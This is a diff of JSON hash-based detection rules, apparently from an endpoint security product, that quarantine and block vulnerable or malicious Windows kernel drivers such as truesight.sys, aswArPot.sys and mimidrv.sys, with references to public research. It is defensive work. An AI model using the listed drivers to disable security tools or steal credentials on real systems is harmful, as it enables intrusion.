+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7d7b33f39fb712a114231a1ecf58d45f08eb6d4100556f24cd55bc3468a5b9fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5db8dcf-d2b3-55b4-897e-bcdc8d1aa417",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143580Z",
+ "creation_date": "2026-03-23T11:45:31.143582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bcd8bd506d8390fdf85aa91ef40b359001cb09e9c45696c31ff5289c422a846",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5ea6323-e034-5703-bbde-bff56bfae436",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834132Z",
+ "creation_date": "2026-03-23T11:45:30.834135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "699e84d8ff00dff1056c826b06f8d9514cbc5316c6087a3badb5654ee7e4c217",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5f85186-cbe9-5919-b46e-6ab01af72170",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500148Z",
+ "creation_date": "2026-03-23T11:45:31.500151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500160Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e6e5e688c858122474f0f37d8dd28a7daf57fb6962312b30ec88a1c077dad14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5fb55f4-fcb7-59a5-8ec0-ab3d97a3ab19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968910Z",
+ "creation_date": "2026-03-23T11:45:29.968912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34e0364a4952d914f23f271d36e11161fb6bb7b64aea22ff965a967825a4a4bf",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d61a06c9-d5ba-50c0-97d8-ad9e24b7fc9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835405Z",
+ "creation_date": "2026-03-23T11:45:30.835408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835417Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a86b668e2380d290a8c6dbaf06ab2582647d7badc69cfaedb9bff4d7cdd26cb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d631d6b0-5bcc-5a43-a717-503732debd1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822300Z",
+ "creation_date": "2026-03-23T11:45:30.822302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10576dad4928b01c21ecd2ed9914abba8bf4edae964d5d9d3c0d64ec7657f3d3",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d63a9d72-d64b-509b-96b6-b12ed14c1883",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818225Z",
+ "creation_date": "2026-03-23T11:45:30.818227Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8edab185e765f9806fa57153db1ede00e68270d2351443ee1de30674eca8d9b6",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d640a694-1b9a-5cfc-a204-173629b14aae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149006Z",
+ "creation_date": "2026-03-23T11:45:31.149009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149017Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77260b530b6da96800832d1b3192aced006d2c9ad5cc89227e060ddaae7ea32a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d654ce02-481d-547e-b2c0-06bc5af2318b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499984Z",
+ "creation_date": "2026-03-23T11:45:31.499987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499995Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e84ee3a620bcbbc803c063f817482f79a1b2706ca4576b091d8c970a99a13a4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d659f295-640e-54dd-8166-22be7c09a18c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622527Z",
+ "creation_date": "2026-03-23T11:45:29.622529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bc3685b0b8adc97931b5d31348da235cd7581a67edf6d79913e6a5709866135",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6672950-b0f6-514a-89c0-663789a4039c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979186Z",
+ "creation_date": "2026-03-23T11:45:29.979188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29a2ae6439381ea2aa3116df7025cbb5c6c7c07cc8d19508e6021e4d6177a565",
+ "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d66c7766-ac85-5795-9dd6-df5842317d2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823580Z",
+ "creation_date": "2026-03-23T11:45:31.823583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "659060d15fc1fc553cb80225b237919a686914f7590b989e10fb72ed9938930b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d673273a-c871-5b8d-9d2e-4286ec032beb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151090Z",
+ "creation_date": "2026-03-23T11:45:31.151092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d7043b497c802662a026c9c9f90941cbc5355aec498a8955a8e03fa2f85af1c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6741839-f890-5333-a8a5-429a98d886a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824983Z",
+ "creation_date": "2026-03-23T11:45:30.824987Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824996Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c823e63427821411c03f3d8706d08a456352b9c9e34340adb2a3c3e34742229c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d674455d-d9e0-58dc-be7c-e8562562c1a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149844Z",
+ "creation_date": "2026-03-23T11:45:31.149846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b183048baf9ead5313607e82e599c973838d9ef4099dcafd11b123c0bb62201",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d67a44ea-f60b-5a3d-84da-36782e7ea480",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985630Z",
+ "creation_date": "2026-03-23T11:45:29.985632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330",
+ "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d681726d-1982-5f87-a990-65e10c4729ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145036Z",
+ "creation_date": "2026-03-23T11:45:31.145038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3aebda5c4cf4decc4b2d87e9662d7f0df2b84795d341511ddf5e015f23f96a6b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6886abc-6dc8-5e14-a44a-23df35b29746",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614266Z",
+ "creation_date": "2026-03-23T11:45:29.614268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bf00eff58e5bbe4cf578ec37b9e13c8fa74511fb2644352fcc091347153a709",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d688ffe5-f2a6-5e06-852e-a4d396eecf70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481455Z",
+ "creation_date": "2026-03-23T11:45:31.481458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0db7c736c1e7db87e28cae1b7a36e74f502a9f719ff28308cbce184c8426a51",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d68ab78c-a7e2-58f8-bb64-af8b9ec2312b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151679Z",
+ "creation_date": "2026-03-23T11:45:31.151682Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4337c501957262ec0285860e07d7d2c94f2dffb0df9cf41597162cc9d2cf89ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6ce4e88-26be-5f83-9c5f-84c58436b13e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468773Z",
+ "creation_date": "2026-03-23T11:45:30.468776Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468785Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b5206b5928e03929cca1eda3f12e6df14b31f80e8c16c1bb29109c072053b90",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6ce8f92-23cc-58f5-92e7-841970f524c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492730Z",
+ "creation_date": "2026-03-23T11:45:31.492733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492742Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ae7329aa54c405421b8ee778dd6e20f8058bd137eae79b2acd20d89fca273d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
